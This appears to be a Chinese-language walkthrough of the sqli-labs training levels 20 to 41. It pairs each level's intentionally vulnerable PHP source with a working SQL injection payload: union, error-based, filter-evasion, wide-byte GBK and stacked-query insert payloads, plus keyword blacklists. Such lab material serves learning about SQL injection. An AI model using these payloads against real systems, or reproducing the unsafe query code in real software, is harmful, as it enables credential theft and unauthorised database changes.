$cookee and expires: " . date($format, $timestamp);                     $cookee = base64_decode($cookee);           echo "<br></font>";         $sql="SELECT * FROM users WHERE username=('$cookee') LIMIT 0,1";            $result=mysql_query($sql);          if (!$result)               {               die('Issue with your mysql: ' . mysql_error());                 }           $row = mysql_fetch_array($result);          if($row)                {               echo '<font color= "pink" font size="5">';                  echo 'Your Login name:'. $row['username'];              echo "<br>";                echo '<font color= "grey" font size="5">';                      echo 'Your Password:' .$row['password'];                echo "</font></b>";             echo "<br>";                echo 'Your ID:' .$row['id'];                }           else                    {               echo "<center>";                echo '<br><br><br>';                echo '<img src="../images/slap1.jpg" />';               echo "<br><br><b>";             //echo '<img src="../images/Less-20.jpg" />';               }           echo '<center>';            echo '<form action="" method="post">';          echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';          echo '</form>';         echo '</center>';       }       else        {       echo '<center>';        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo '<font color= "#FFFF00" font size = 6 >';      echo " Your Cookie is deleted";             setcookie('uname', base64_encode($row1['username']), time()-3600);              header ('Location: index.php');     echo '</font></center></br>';               }                           echo "<br>";            echo "<br>";            //header ('Location: main.php');            echo "<br>";            echo "<br>";                        //echo '<img src="../images/slap.jpg" /></center>';         //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');        fwrite($fp,'Cookie:'.$cookee."\n");         fclose($fp);    }





if(!isset($_COOKIE['uname']))   {   //including the Mysql connect parameters.   include("../sql-connections/sql-connect.php");  echo "<div style=' margin-top:20px;color:#FFF; font-size:24px; text-align:center'> Welcome   <font color='#FF0000'> Dhakkan </font><br></div>"; echo "<div  align='center' style='margin:20px 0px 0px 510px;border:20px; background-color:#0CF; text-align:center;width:400px; height:150px;'>";    echo "<div style='padding-top:10px; font-size:15px;'>";     echo "<!--Form to post the contents -->";   echo '<form action=" " name="form1" method="post">';    echo ' <div style="margin-top:15px; height:30px;">Username :    ';  echo '   <input type="text"  name="uname" value=""/>  </div>';      echo ' <div> Password :      '; echo '   <input type="text" name="passwd" value=""/></div></br>';       echo '   <div style=" margin-top:9px;margin-left:90px;"><input type="submit" name="submit" value="Submit" /></div>';    echo '</form>'; echo '</div>';  echo '</div>';  echo '<div style=" margin-top:10px;color:#FFF; font-size:23px; text-align:center">';    echo '<font size="3" color="#FFFF00">'; echo '<center><br><br><br>';    echo '<img src="../images/Less-22.jpg" />'; echo '</center>';   function check_input($value)    {   if(!empty($value))      {       $value = substr($value,0,20); // truncation (see comments)      }       if (get_magic_quotes_gpc())  // Stripslashes if magic quotes enabled            {           $value = stripslashes($value);          }       if (!ctype_digit($value))       // Quote if not a number            {           $value = "'" . mysql_real_escape_string($value) . "'";          }   else        {       $value = intval($value);        }   return $value;  }       echo "<br>";    echo "<br>";        if(isset($_POST['uname']) && isset($_POST['passwd']))       {           $uname = check_input($_POST['uname']);      $passwd = check_input($_POST['passwd']);        $sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";       $result1 = mysql_query($sql);       $row1 = mysql_fetch_array($result1);            if($row1)               {               echo '<font color= "#FFFF00" font size = 3 >';              setcookie('uname', base64_encode($row1['username']), time()+3600);                  header ('Location: index.php');             echo "I LOVE YOU COOKIES";              echo "</font>";             echo '<font color= "#0000ff" font size = 3 >';                          //echo 'Your Cookie is: ' .$cookee;             echo "</font>";             echo "<br>";                print_r(mysql_error());                         echo "<br><br>";                echo '<img src="../images/flag.jpg" />';                echo "<br>";                }           else                {               echo '<font color= "#0000ff" font size="3">';               //echo "Try again looser";              print_r(mysql_error());             echo "</br>";                           echo "</br>";               echo '<img src="../images/slap.jpg" />';                    echo "</font>";                 }           }                   echo "</font>";     echo '</font>'; echo '</div>';}else{    if(!isset($_POST['submit']))        {           $cookee = $_COOKIE['uname'];            $format = 'D d M Y - H:i:s';            $timestamp = time() + 3600;         echo "<center>";            echo "<br><br><br><b>";         echo '<img src="../images/Less-21.jpg" />';         echo "<br><br><b>";         echo '<br><font color= "red" font size="4">';               echo "YOUR USER AGENT IS : ".$_SERVER['HTTP_USER_AGENT'];           echo "</font><br>";             echo '<font color= "cyan" font size="4">';              echo "YOUR IP ADDRESS IS : ".$_SERVER['REMOTE_ADDR'];                       echo "</font><br>";                     echo '<font color= "#FFFF00" font size = 4 >';          echo "DELETE YOUR COOKIE OR WAIT FOR IT TO EXPIRE <br>";            echo '<font color= "orange" font size = 5 >';                       echo "YOUR COOKIE : uname = $cookee and expires: " . date($format, $timestamp);                     $cookee = base64_decode($cookee);           $cookee1 = '"'. $cookee. '"';           echo "<br></font>";         $sql="SELECT * FROM users WHERE username=$cookee1 LIMIT 0,1";           $result=mysql_query($sql);          if (!$result)               {               die('Issue with your mysql: ' . mysql_error());                 }           $row = mysql_fetch_array($result);          if($row)                {               echo '<font color= "pink" font size="5">';                  echo 'Your Login name:'. $row['username'];              echo "<br>";                echo '<font color= "grey" font size="5">';                      echo 'Your Password:' .$row['password'];                echo "</font></b>";             echo "<br>";                echo 'Your ID:' .$row['id'];                }           else                    {               echo "<center>";                echo '<br><br><br>';                echo '<img src="../images/slap1.jpg" />';               echo "<br><br><b>";             //echo '<img src="../images/Less-20.jpg" />';               }           echo '<center>';            echo '<form action="" method="post">';          echo '<input  type="submit" name="submit" value="Delete Your Cookie!" />';          echo '</form>';         echo '</center>';       }       else        {       echo '<center>';        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo "<br>";        echo '<font color= "#FFFF00" font size = 6 >';      echo " Your Cookie is deleted";             setcookie('uname', base64_encode($row1['username']), time()-3600);              header ('Location: index.php');     echo '</font></center></br>';               }                           echo "<br>";            echo "<br>";            //header ('Location: main.php');            echo "<br>";            echo "<br>";                        //echo '<img src="../images/slap.jpg" /></center>';         //logging the connection parameters to a file for analysis.         $fp=fopen('result.txt','a');        fwrite($fp,'Cookie:'.$cookee."\n");         fclose($fp);    }





if(isset($_GET['id'])){$id=$_GET['id'];//filter the comments out so as to comments should not work$reg = "/#/";$reg1 = "/--/";$replace = "";$id = preg_replace($reg, $replace, $id);$id = preg_replace($reg1, $replace, $id);//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result); if($row)    {   echo '<font color= "#0000ff">';     echo 'Your Login name:'. $row['username'];      echo "<br>";    echo 'Your Password:' .$row['password'];    echo "</font>";     }   else    {   echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>";     }}


1' union select 1,2,database()'




可以看到修改密码的sql语句$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";,只要用户名里带注释符,并且闭合就能把后面的注释掉而改变别的用户的密码








if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;  $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";     }}function blacklist($id){  $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive) $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)        return $id;}


payload1' oorrder by 3%23


使用||绕过,使用报错注入,1' || updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)--+



if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);   //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;// connectivity $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);    if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      //echo 'YOU ARE IN ........';               echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font size="5" color="#FFFF00">';     //echo 'You are in...........';     //print_r(mysql_error());       //echo "You have an error in your SQL syntax";      echo "</br></font>";            echo '<font color= "#0000ff" font size= 3>';            }}  else {  echo "Please input the ID as parameter with numeric value";}function blacklist($id){    $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive) $id= preg_replace('/AND/i',"", $id);        //Strip out AND (non case sensitive)        return $id;}


-1 || 1=2 union select 1,2,database()--+



if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;// connectivity   $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";     }}  else { echo "Please input the ID as parameter with numeric value";}function blacklist($id){ $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)    $id= preg_replace('/[\/\*]/',"", $id);      //strip out /*  $id= preg_replace('/[--]/',"", $id);        //Strip out --  $id= preg_replace('/[#]/',"", $id);         //Strip out #   $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces  $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes return $id;}



%20 %09 %0a %0b %0c %0d %a0 %00 /**/ /*!*/





if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;// connectivity   $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     //print_r(mysql_error());       echo "</font>";     }}  else { echo "Please input the ID as parameter with numeric value";}function blacklist($id){ $id= preg_replace('/or/i',"", $id);         //strip out OR (non case sensitive) $id= preg_replace('/and/i',"", $id);        //Strip out AND (non case sensitive)    $id= preg_replace('/[\/\*]/',"", $id);      //strip out /*  $id= preg_replace('/[--]/',"", $id);        //Strip out --  $id= preg_replace('/[#]/',"", $id);         //Strip out #   $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces  $id= preg_replace('/[\s]/',"", $id);        //Strip out spaces  $id= preg_replace('/[\/\\\\]/',"", $id);        //Strip out slashes return $id;}





if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;// connectivity   $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";     }}  else { echo "Please input the ID as parameter with numeric value";}function blacklist($id){$id= preg_replace('/[\/\*]/',"", $id);       //strip out /*$id= preg_replace('/[--]/',"", $id);      //Strip out --.$id= preg_replace('/[#]/',"", $id);          //Strip out #.$id= preg_replace('/[ +]/',"", $id);      //Strip out spaces.$id= preg_replace('/select/m',"", $id);      //Strip out spaces.$id= preg_replace('/[ +]/',"", $id);     //Strip out spaces.$id= preg_replace('/union/s',"", $id);       //Strip out union$id= preg_replace('/select/s',"", $id);        //Strip out select$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT$id= preg_replace('/Union/s',"", $id);        //Strip out Union$id= preg_replace('/Select/s',"", $id);        //Strip out selectreturn $id;}





if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;  $id = '"' .$id. '"';// connectivity     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     //print_r(mysql_error());       echo "</font>";     }}  else { echo "Please input the ID as parameter with numeric value";}function blacklist($id){$id= preg_replace('/[\/\*]/',"", $id);       //strip out /*$id= preg_replace('/[--]/',"", $id);      //Strip out --.$id= preg_replace('/[#]/',"", $id);          //Strip out #.$id= preg_replace('/[ +]/',"", $id);      //Strip out spaces.$id= preg_replace('/select/m',"", $id);      //Strip out spaces.$id= preg_replace('/[ +]/',"", $id);     //Strip out spaces.$id= preg_replace('/union/s',"", $id);       //Strip out union$id= preg_replace('/select/s',"", $id);        //Strip out select$id= preg_replace('/UNION/s',"", $id);        //Strip out UNION$id= preg_replace('/SELECT/s',"", $id);        //Strip out SELECT$id= preg_replace('/Union/s',"", $id);        //Strip out Union$id= preg_replace('/Select/s',"", $id);        //Strip out Selectreturn $id;}





if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;// connectivity   $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     //print_r(mysql_error());       echo "</font>";     }}  else { echo "Please input the ID as parameter with numeric value";}function blacklist($id){$id= preg_replace('/[\/\*]/',"", $id);               //strip out /*$id= preg_replace('/[--]/',"", $id);              //Strip out --.$id= preg_replace('/[#]/',"", $id);                  //Strip out #.$id= preg_replace('/[ +]/',"", $id);              //Strip out spaces.//$id= preg_replace('/select/m',"", $id);                //Strip out spaces.$id= preg_replace('/[ +]/',"", $id);             //Strip out spaces.$id= preg_replace('/union\s+select/i',"", $id);      //Strip out UNION & SELECT.return $id;}

这一关主要加了个union select过滤,但由于空格已经被过滤,使用的绕过空格,所以这个过滤完全就是摆设




if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    //fiddling with comments    $id= blacklist($id);    //echo "<br>";  //echo $id; //echo "<br>";  $hint=$id;// connectivity   $sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     //print_r(mysql_error());       echo "</font>";     }}  else { echo "Please input the ID as parameter with numeric value";}function blacklist($id){//$id= preg_replace('/[\/\*]/',"", $id);             //strip out /*//$id= preg_replace('/[--]/',"", $id);                //Strip out --.//$id= preg_replace('/[#]/',"", $id);                    //Strip out #.//$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.//$id= preg_replace('/select/m',"", $id);                //Strip out spaces.//$id= preg_replace('/[ +]/',"", $id);               //Strip out spaces.$id= preg_replace('/union\s+select/i',"", $id);      //Strip out spaces.return $id;}




if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    $qs = $_SERVER['QUERY_STRING']; $hint=$qs;// connectivity   $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";    $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";     }}

这个跟Less-1一样没有过滤,直接联合注入20' union select 1,2,database()%23



if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    $qs = $_SERVER['QUERY_STRING']; $hint=$qs;  $id = '"' .$id. '"';// connectivity     $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     //print_r(mysql_error());       echo "</font>";     }}


20"union select 1,2,database()--+



if(isset($_GET['id'])){ $id=$_GET['id'];    //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'ID:'.$id."\n"); fclose($fp);    $qs = $_SERVER['QUERY_STRING']; $hint=$qs;  $id = '"'.$id.'"';// connectivity   $sql="SELECT * FROM users WHERE id= ($id) LIMIT 0,1";   $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       echo "<font size='5' color= '#99FF00'>";            echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "</font>";     }   else    {       echo '<font color= "#FFFF00">';     print_r(mysql_error());     echo "</font>";     }}


20")union select 1,2,database()--+



function check_addslashes($string){    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);          //escape any backslash    $string = preg_replace('/\'/i', '\\\'', $string);                               //escape single quote with a backslash    $string = preg_replace('/\"/', "\\\"", $string);                                //escape double quote with a backslash              return $string;}if(isset($_GET['id'])){$id=check_addslashes($_GET['id']);//echo "The filtered request is :" .$id . "<br>";//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity mysql_query("SET NAMES gbk");$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);    if($row)    {   echo '<font color= "#00FF00">';     echo 'Your Login name:'. $row['username'];      echo "<br>";    echo 'Your Password:' .$row['password'];    echo "</font>";     }   else    {   echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>";     }}


payload20%df%5c%27union select 1,2,database()--+



if(isset($_GET['id'])){$id=check_addslashes($_GET['id']);//echo "The filtered request is :" .$id . "<br>";//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);mysql_query("SET NAMES gbk");$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);   if($row)    {   echo '<font color= "#00FF00">';     echo 'Your Login name:'. $row['username'];      echo "<br>";    echo 'Your Password:' .$row['password'];    echo "</font>";     }   else    {   echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>";     }}

这一关跟上一关一样,payload20%df%5c%27union select 1,2,database()--+



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname1=$_POST['uname'];    $passwd1=$_POST['passwd'];        //echo "username before addslashes is :".$uname1 ."<br>";        //echo "Input password before addslashes is : ".$passwd1. "<br>";            //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname1);   fwrite($fp,'Password:'.$passwd1."\n");  fclose($fp);                $uname = addslashes($uname1);        $passwd= addslashes($passwd1);                //echo "username after addslashes is :".$uname ."<br>";        //echo "Input password after addslashes is : ".$passwd;       // connectivity     mysql_query("SET NAMES gbk");   @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in\n\n " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "<br>";        echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"  />';                   echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg" />';            echo "</font>";     }}


passwd=1&uname=20運'or 1=2 union select 1,database()#



function check_addslashes($string){    $string = addslashes($string);    return $string;}// take the variables if(isset($_GET['id'])){$id=check_addslashes($_GET['id']);//echo "The filtered request is :" .$id . "<br>";//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity mysql_query("SET NAMES gbk");$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);  if($row)    {   echo '<font color= "#00FF00">';     echo 'Your Login name:'. $row['username'];      echo "<br>";    echo 'Your Password:' .$row['password'];    echo "</font>";     }   else    {   echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>";     }}


20 union select 1,2,database()#



function check_quotes($string){    $string= mysql_real_escape_string($string);        return $string;}// take the variables if(isset($_GET['id'])){$id=check_quotes($_GET['id']);//echo "The filtered request is :" .$id . "<br>";//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity mysql_query("SET NAMES gbk");$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);   if($row)    {   echo '<font color= "#00FF00">';     echo 'Your Login name:'. $row['username'];      echo "<br>";    echo 'Your Password:' .$row['password'];    echo "</font>";     }   else    {   echo '<font color= "#FFFF00">'; print_r(mysql_error()); echo "</font>";     }}


一样的使用宽字符绕过即可,payload20%df%5c%27union select 1,2,database()--+



if(isset($_POST['uname']) && isset($_POST['passwd'])){  $uname1=$_POST['uname'];    $passwd1=$_POST['passwd'];        //echo "username before addslashes is :".$uname1 ."<br>";        //echo "Input password before addslashes is : ".$passwd1. "<br>";            //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a');    fwrite($fp,'User Name:'.$uname1);   fwrite($fp,'Password:'.$passwd1."\n");  fclose($fp);                $uname = mysql_real_escape_string($uname1);        $passwd= mysql_real_escape_string($passwd1);                //echo "username after addslashes is :".$uname ."<br>";        //echo "Input password after addslashes is : ".$passwd;       // connectivity     mysql_query("SET NAMES gbk");   @$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";  $result=mysql_query($sql);  $row = mysql_fetch_array($result);  if($row)    {       //echo '<font color= "#0000ff">';                   echo "<br>";        echo '<font color= "#FFFF00" font size = 4>';       //echo " You Have successfully logged in\n\n " ;        echo '<font size="3" color="#0000ff">';         echo "<br>";        echo 'Your Login name:'. $row['username'];      echo "<br>";        echo 'Your Password:' .$row['password'];        echo "<br>";        echo "</font>";     echo "<br>";        echo "<br>";        echo '<img src="../images/flag.jpg"  />';                   echo "</font>";     }   else    {       echo '<font color= "#0000ff" font size="3">';       //echo "Try again looser";      print_r(mysql_error());     echo "</br>";       echo "</br>";       echo "</br>";       echo '<img src="../images/slap.jpg" />';            echo "</font>";     }}

这一关跟上一关过滤一样,只是把请求方式改成了post,payloadpasswd=1&uname=20運'union select 1,database()--+



if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);// Check connectionif (mysqli_connect_errno($con1)){    echo "Failed to connect to MySQL: " . mysqli_connect_error();}else{    @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");}$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";/* execute multi query */if (mysqli_multi_query($con1, $sql)){            /* store first result set */    if ($result = mysqli_store_result($con1))    {        if($row = mysqli_fetch_row($result))        {            echo '<font size = "5" color= "#00FF00">';               printf("Your Username is : %s", $row[1]);            echo "<br>";            printf("Your Password is : %s", $row[2]);            echo "<br>";            echo "</font>";        }//            mysqli_free_result($result);    }        /* print divider */    if (mysqli_more_results($con1))    {            //printf("-----------------\n");    }     //while (mysqli_next_result($con1));}else     {   echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));   echo "</font>";      }/* close connection */mysqli_close($con1);}

Less-38 到 Less-53都是堆叠注入

堆叠注入可以直接插入数据,payload1';insert into users values('38','laotun','123456')--+





if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);// Check connectionif (mysqli_connect_errno($con1)){    echo "Failed to connect to MySQL: " . mysqli_connect_error();}else{    @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");}$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";/* execute multi query */if (mysqli_multi_query($con1, $sql)){            /* store first result set */    if ($result = mysqli_store_result($con1))    {        if($row = mysqli_fetch_row($result))        {            echo '<font size = "5" color= "#00FF00">';             printf("Your Username is : %s", $row[1]);            echo "<br>";            printf("Your Password is : %s", $row[2]);            echo "<br>";            echo "</font>";        }//            mysqli_free_result($result);    }        /* print divider */    if (mysqli_more_results($con1))    {            //printf("-----------------\n");    }     //while (mysqli_next_result($con1));}else     {   echo '<font size="5" color= "#FFFF00">';    print_r(mysqli_error($con1));   echo "</font>";      }/* close connection */mysqli_close($con1);}

这一关相比于上一关只是把字符型改成了数字型,payload1;insert into users values('39','laotun','123456')--+





if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);// Check connectionif (mysqli_connect_errno($con1)){    echo "Failed to connect to MySQL: " . mysqli_connect_error();}else{    @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");}$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";/* execute multi query */if (mysqli_multi_query($con1, $sql)){            /* store first result set */    if ($result = mysqli_store_result($con1))    {        if($row = mysqli_fetch_row($result))        {            echo '<font size = "5" color= "#00FF00">';             printf("Your Username is : %s", $row[1]);            echo "<br>";            printf("Your Password is : %s", $row[2]);            echo "<br>";            echo "</font>";        }//            mysqli_free_result($result);    }        /* print divider */    if (mysqli_more_results($con1))    {            //printf("-----------------\n");    }     //while (mysqli_next_result($con1));}/* close connection */mysqli_close($con1);}

这关是用括号和单引号包裹起来了,绕过即可1');insert into users values('40','laotun','123456')--+





if(isset($_GET['id'])){$id=$_GET['id'];//logging the connection parameters to a file for analysis.$fp=fopen('result.txt','a');fwrite($fp,'ID:'.$id."\n");fclose($fp);// connectivity//mysql connections for stacked query examples.$con1 = mysqli_connect($host,$dbuser,$dbpass,$dbname);// Check connectionif (mysqli_connect_errno($con1)){    echo "Failed to connect to MySQL: " . mysqli_connect_error();}else{    @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database: $dbname");}$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";/* execute multi query */if (mysqli_multi_query($con1, $sql)){            /* store first result set */    if ($result = mysqli_store_result($con1))    {        if($row = mysqli_fetch_row($result))        {            echo '<font size = "5" color= "#00FF00">';             printf("Your Username is : %s", $row[1]);            echo "<br>";            printf("Your Password is : %s", $row[2]);            echo "<br>";            echo "</font>";        }//            mysqli_free_result($result);    }        /* print divider */    if (mysqli_more_results($con1))    {            //printf("-----------------\n");    }     //while (mysqli_next_result($con1));}/* close connection */mysqli_close($con1);}


payload1;insert into users values('41','laotun','123456')--+





